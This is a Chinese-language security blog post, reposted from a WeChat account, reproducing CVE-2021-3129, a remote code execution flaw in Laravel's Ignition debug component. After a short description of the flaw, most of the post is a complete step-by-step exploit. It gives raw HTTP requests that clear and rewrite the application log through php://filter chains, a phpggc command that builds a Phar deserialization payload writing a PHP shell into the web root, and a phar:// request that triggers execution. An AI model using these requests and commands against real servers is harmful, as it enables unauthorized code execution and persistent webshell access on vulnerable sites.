Laravel 是一个由Taylor Otwell所建立,自由开源的 PHP Web 框架,旨在实现的Web软件的MVC架构,并作为CodeIgniter的替代方案。其源代码托管于GitHub,许可条款为MIT许可证。Laravel的特色包含:支持用户身份验证和许可,具有模块化的包系统且有专属的包库,提供连接许多种类的关连式数据库的方式,提供工具来协助应用程序的部署和维持,并且发展出许多语法糖。
Laravel与Symfony、Zend、CodeIgniter、Yii2 和其他框架一起被视为最受欢迎的 PHP 框架之一。
CVE-2021-3129
一、漏洞描述
当Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终进行远程代码执行。
二、影响范围
Laravel < 8.4.3
Ignition组件 < 2.5.2
三、POC
页面返回500并出现了Ignition的报错说明漏洞存在。
POST /_ignition/execute-solution HTTP/1.1Host: 1.1.1.1:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Connection: closeContent-Type: application/jsonContent-Length: 167{"solution":"Facade\Ignition\Solutions\MakeViewVariableOptionalSolution","parameters": {"variableName":"username","viewFile":"xxxxxx"}}
四、漏洞利用
1.清空日志文件,失败就多执行几次
POST /_ignition/execute-solution HTTP/1.1Host: 1.1.1.1:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Connection: closeContent-Type: application/jsonContent-Length: 328 { "solution": "Facade\Ignition\Solutions\MakeViewVariableOptionalSolution", "parameters": { "variableName": "username", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log" }}
2.生成反序列化Payload
git clone https://github.com/ambionics/phpggc.git
要在phpggc目录执行以下命令,不清楚就看Payload。
php -d "phar.readonly=0" ./phpggc Laravel/RCE5 "system('echo PD9waHAgcGhwaW5mbygpOyA/Pg==|base64 -d > /var/www/html/shell.php');" --phar phar -o php://output | base64 -w 0 | python3 -c "import sys;print(''.join(['=' + hex(ord(i))[2:] + '=00' for i in sys.stdin.read()]).upper())"(1)将shell进行Base64编码
(2)注意调整绝对路径
3.给Log增加一个前缀,用于在日志中对齐刚刚的Payload。
POST /_ignition/execute-solution HTTP/1.1Host: 1.1.1.1:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Connection: closeContent-Type: application/jsonContent-Length: 163{"solution":"Facade\Ignition\Solutions\MakeViewVariableOptionalSolution","parameters": {"variableName":"username","viewFile":"AA"}}
4.发送Payload
POST /_ignition/execute-solution HTTP/1.1Host: 1.1.1.1:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Connection: closeContent-Type: application/jsonContent-Length: 5322 { "solution": "Facade\Ignition\Solutions\MakeViewVariableOptionalSolution", "parameters": { "variableName": "username", "viewFile": "=50=00=44=00=39=00=77=00=........00=31=00=43=00a" }}
5.清空log文件中的干扰字符,只留下Payload。如果500错误多发送几次即可。
POST /_ignition/execute-solution HTTP/1.1Host: 1.1.1.1:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Connection: closeContent-Type: application/jsonContent-Length: 299 { "solution": "Facade\Ignition\Solutions\MakeViewVariableOptionalSolution", "parameters": { "variableName": "username", "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log" }}
6.使用phar://触发反序列化
Linux
POST /_ignition/execute-solution HTTP/1.1Host: 1.1.1.1:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Connection: closeContent-Type: application/jsonContent-Length: 210{"solution":"Facade\Ignition\Solutions\MakeViewVariableOptionalSolution","parameters": {"variableName":"username","viewFile":"phar:///var/www/storage/logs/laravel.log/test.txt"}}
Tips: 1.实际利用需要调整绝对路径
2.Windows需要调整"viewFile"中的UNC符也就是"/"->""
7.访问phpinfo
写入shell
Tips:shell路径自行研究,文章内已写。
原文始发于微信公众号(YongYe 安全实验室):CVE-2021-3129__Laravel-RCE复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论